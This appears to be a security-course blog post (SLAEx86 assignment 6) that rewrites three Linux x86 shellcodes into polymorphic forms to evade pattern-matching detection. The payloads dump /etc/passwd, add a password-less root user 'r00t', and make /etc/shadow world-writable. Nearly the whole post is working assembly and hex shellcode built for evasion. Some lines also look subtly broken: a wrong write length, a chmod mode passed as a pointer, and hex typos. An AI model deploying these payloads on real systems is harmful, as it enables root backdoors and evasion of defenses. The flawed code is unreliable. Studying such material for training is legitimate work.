Close

SLAEx86 - Assignment 6

The sixth assignment for the SLAEx86 certification includes the following requirements:

  • Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
  • The polymorphic versions cannot be larger 150% of the existing shellcode
  • Bonus points for making it shorter in length than original

Shellcode 1:  /bin/cat /etc/passwd
Source: http://shell-storm.org/shellcode/files/shellcode-571.php
Size: 43 bytes

Original code, shellcode and assembly code:

#include <stdio.h>#include <stdio.h> 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h 

int main()
{(*(void (*)()) shellcode)(); 

return 0;
}  

/*shellcode[]= "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"  
          "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80


global _start
 
section .text
_start:

    xor eax,eax 
    cdq 
    push edx

    ; push dword 0x7461632f 
    ; push dword 0x6e69622f

    mov esi, 0x6350521e 
    add esi, 0x11111111 
    mov dword [esp-4], esi

    mov edi, 0x5d58511e 
    add edi, 0x11111111 
    mov dword [esp-8], edi 
    sub esp, 8

    mov ebx,esp
 
    push edx

    ; push dword 0x64777373

    mov esi, 0x75888484 
    sub esi, 0x11111111 
    mov dword [esp-4], esi 
    sub esp, 4 

    push dword 0x61702f2f 
    push dword 0x6374652f

    mov ecx,esp
 
    mov al,0xb

    push edx 
    push ecx 
    push ebx 
    mov ecx,esp
 
    int 0x80

Polymorphic  assembly code with comments:

; Filename - bin_cat.nasm
; Purpose - displays the contents of the /etc/passwd file using the /bin/cat command
; Source - http://shell-storm.org/shellcode/files/shellcode-571.php

global _start

section .text
_start:

    sub eax, eax                  ; set eax = 0
    push eax                      ; put 0 to the stack

    mov eax, 0x74612f63           ; put ta/c into eax
    xchg al, ah                   ; swap bytes to correct order
    mov dword [esp-4], eax        ; place tac/ into esp-4

    mov edx, 0x6e692f62           ; put ni/b into edx
    xchg dl, dh                   ; swap bytes to correct order
    mov dword [esp-8], edx        ; place nib/ into esp-8

    sub esp, 8                    ; offset esp by 8

    mov ebx, esp                  ; set stack value /bin/cat into ebx

    xor eax, eax                  ; set eax = 0
    xor edx, edx                  ; set edx = 0
 
    push eax                      ; put 0 to stack
 
    mov esi, 0x323bb9b9           ; dwss rotated right 1
    rol esi, 1                    ; rotate values left 1
    inc esi                       ; increment esi by 1
    mov dword [esp-4], esi        ; place dwss into esp-4

    mov ebp, 0x30b81797           ; ap// rotated right 1
    rol ebp, 1                    ; rotate values left 1
    inc ebp                       ; increment ebp by 1
    mov dword [esp-8], ebp        ; place ap// into esp-8

    mov edi, 0x31ba3297           ; cte/ rotated right 1
    rol edi, 1                    ; rotate values left 1
    inc edi                       ; increment edi by 1
    mov dword [esp-12], edi       ; place cte/ into esp-12

    sub esp, 12                   ; offset esp by 12

    mov ecx, esp                  ; set stack value /etc/passwd into ecx

    push edx                      ; push 0 to stack
    push ecx                      ; push /etc/passwd to stack
    push ebx                      ; push /bin/cat to stack

    mov ecx, esp                  ; place final command into ecx

    mov al, 0xb                   ; set eax to execve syscall
    int 0x80                      ; call execve syscall

Original shellcode:

\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80

Polymorphic shellcode:

\x29\xc0\x50\xb8\x63\x2f\x61\x74\x86\xc4\x89\x44\x24\xfc\xba\x62\x2f\x69\x6e\x86\xd6\x89\x54\x24\xf8\x83\xec\x08\x89\xe3\x31\xc0\x31\xd2\x50\xbe\xb9\xb9\x3b\x32\xd1\xc6\x46\x89\x74\x24\xfc\xbd\x97\x17\xb8\x30\xd1\xc5\x45\x89\x6c\x24\xf8\xbf\x97\x32\xba\x31\xd1\xc7\x47\x89\x7c\x24\xf4\x83\xec\x0c\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80

Final size of polymorphic shellcode: 85 bytes


Shellcode 2:  Add root user ‘r00t’ with no password to /etc/passwd
Source:  http://shell-storm.org/shellcode/files/shellcode-211.php 
Size: 69 bytes

Original code, shellcode and assembly code:

/* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 * global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 * push byte 5
 * pop eax
 * xor ecx, ecx
 * push ecx
 * push 0x64777373
 * push 0x61702f2f
 * push 0x6374652f
 * mov ebx, esp
 * mov cx, 02001Q
 * int 0x80
 *
 * mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 * push byte 4
 * pop eax
 * xor edx, edx
 * push edx
 * push 0x3a3a3a30
 * push 0x3a303a3a
 * push 0x74303072
 * mov ecx, esp
 * push byte 12
 * pop edx
 * int 0x80
 *
 * ; close(ebx)
 *
 * push byte 6
 * pop eax
 * int 0x80
 *
 * ; exit()
 *
 * push byte 1
 * pop eax
 * int 0x80
 */

main()
{
 char shellcode[] =
 "\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"
 "\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"
 "\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"
 "\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"
 "\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"
 "\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";

(*(void (*)()) shellcode)();
}

Polymorphic  assembly code with comments:

; Filename - r00tuser.nasm
; Purpose - adds a root user 'r00t' with no password to /etc/passwd
; Source - http://shell-storm.org/shellcode/files/shellcode-211.php

global _start

section .text
_start:

; open syscall --> ("/etc//passwd", O_WRONLY | 0_APPEND)

    xor eax, eax                  ; clear eax to 0
    mov al, 0x5                   ; set eax to open syscall
    sub ecx, ecx                  ; set ecx to 0
    push ecx                      ; ecx = 0 to stack

    mov esi, 0x73737764           ; dwss reversed (sswd)
    bswap esi                     ; swap bytes back to 0x64777373 
    mov dword [esp-4], esi        ; set value to esp-4

    mov edi, 0x2f2f7061           ; ap// reversed (//pa)
    bswap edi                     ; swap bytes back to 0x61702f2f
    mov dword [esp-8], edi        ; set value to esp-8

    mov ebp, 0x2f657463           ; cte/ reversed (/etc)
    bswap ebp                     ; swap bytes back to 0x6374652f
    mov dword [esp-12], ebp       ; set value to esp-12

    sub esp, 12                   ; adjust stack pointer by 12
    mov ebx, esp                  ; set value of ebx to /etc//passwd

    mov dx, 0x3e1                 ; set edi to 20 less than 0x401
    add edx, 0x20                 ; set edi to 0x401 value
    mov ecx, edx                  ; set 0x401 into ecx

    int 0x80                      ; call open syscall --> ("/etc//passwd", O_WRONLY | 0_APPEND)

    mov ebx, eax                  ; save file descriptor in ebx
    xor edx, edx                  ; clear edx to 0

; write syscall --> (ebx file descriptor, "r00t::0:0:::", 12)

    xor eax, eax                  ; clear eax to 0
    mov al, 0x4                   ; set eax to write syscall
    push edx                      ; edx = 0 to stack

    xor esi, esi                  ; clear esi to 0
    xor edi, edi                  ; clear edi to 0
    xor ebp, ebp                  ; clear ebp to 0

    mov esi, 0x303a3a3a           ; :::0 reversed (0:::)
    bswap esi                     ; swap bytes back to 0x3a3a3a30
    mov dword [esp-4], esi        ; set value to esp-4

    mov edi, 0x3a3a303a           ; :0:: reversed (::0:)
    bswap edi                     ; swap bytes back to 0x3a303a3a
    mov dword [esp-8], edi        ; set value to esp-8

    mov ebp, 0x72303074           ; t00r reversed (r00t)
    bswap ebp                     ; swap bytes back to 0x74303072
    mov dword [esp-12], ebp       ; set value to esp-12

    sub esp, 12
    mov ecx, esp                  ; move esp ("r00t::0:0:::") into ecx

    mov dl, 0x12                  ; move the value of 12 into edx

    int 0x80                      ; call write syscall --> (ebx file descriptor, "r00t::0:0:::", 12)

; close and exit program

    xor eax, eax                  ; clear eax to 0
    mov al, 0x6                   ; set eax to close syscall

    int 0x80                      ; call close syscall

    xor eax, eax                  ; clear eax to 0
    mov al, 0x1                   ; set eax to exit syscall

    int 0x80                      ; call exit syscall --> close program

Original shellcode:

\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80

Polymorphic shellcode:

\x31\xc0\xb0\x05\x29\xc9\x51\xbe\x64\x77\x73\x73\x0f\xce\x89\x74\x24\xfc\xbf\x61\x70\x2f\x2f\x0f\xcf\x89\x7c\x24\xf8\xbd\x63\x74\x65\x2f\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\xba\xe1\x03\x83\xc2\x20\x89\xd1\xcd\x80\x89\xc3\x31\xd2\x31\xc0\xb0\x04\x52\x31\xf6\x31\xff\x31\xed\xbe\x3a\x3a\x3a\x30\x0f\xce\x89\x74\x24\xfc\xbf\x3a\x30\x3a\x3a\x0f\xcf\x89\x7c\x24\xf8\xbd\x74\x30\x30\x72\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe1\xb2\x12\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80

Final size of polymorphic shellcode: 125 bytes

Executing the new shellcode adds the new ‘r00t‘ user into the /etc/passwd file:


Shellcode 3:  chmod /etc/shadow to 0666
Source:  http://shell-storm.org/shellcode/files/shellcode-210.php 
Size: 36 bytes

Original code, shellcode and assembly code:

/* By Kris Katterjohn 8/29/2006
 *
 * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
 *
 * To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
 *
 *
 *
 * section .text
 *
 * global _start
 *
 * _start:
 * xor edx, edx
 *
 * push byte 15
 * pop eax
 * push edx
 * push byte 0x77
 * push word 0x6f64
 * push 0x6168732f
 * push 0x6374652f
 * mov ebx, esp
 * push word 0666Q
 * pop ecx
 * int 0x80
 *
 * push byte 1
 * pop eax
 * int 0x80
 */

main()
{
 char shellcode[] =
 "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
 "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
 "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";

(*(void (*)()) shellcode)();
}

Polymorphic  assembly code with comments:

; Filename - shadow.nasm
; Purpose - change permission of /etc/shadow file to 666
; Source - http://shell-storm.org/shellcode/files/shellcode-210.php

global _start

section .text
_start:

    sub eax, eax                       ; set eax to 0
    push eax                           ; push first null dword to stack

    mov esi, 0x776f6411                ; woda - 50 hex (80 decimal)
    mov edi, 0x68732f5f                ; hs// + 30 hex (48 decimal)
    mov ebp, 0x63746544                ; cte/ + 15 hex (21 decimal)

    add esi, 80
    sub edi, 48
    sub ebp, 21

    mov dword [esp-4], esi
    mov dword [esp-8], edi
    mov dword [esp-12], ebp

    sub esp, 12

    mov ebx, esp                       ; set ebx to /etc//shadow

    push word 0x1b6                    ; push 666 to stack
    mov ecx, esp                       ; set ecx to 666

    mov al, 0xf                        ; set chmod syscall to al
    int 0x80                           ; call chmod syscall

Original shellcode:

\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80

Polymorphic shellcode:

\x29\xc0\x50\xbe\x11\x64\x6f\x77\xbf\x5f\x2f\x73\x68\xbd\x44\x65\x74\x63\x83\xc6\x50\x83\xef\x30\x83\xed\x15\x89\x74\x24\xfc\x89\x7c\x24\xf8\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\x68\xb6\x01\x89\xe1\xb0\x0f\xcd\x80

Final size of polymorphic shellcode: 54 bytes

After executing the shellcode and verifying the permissions of the /etc/shadow file were changed I was able to open the file as a regular user account:

Leave a Reply

Your email address will not be published. Required fields are marked *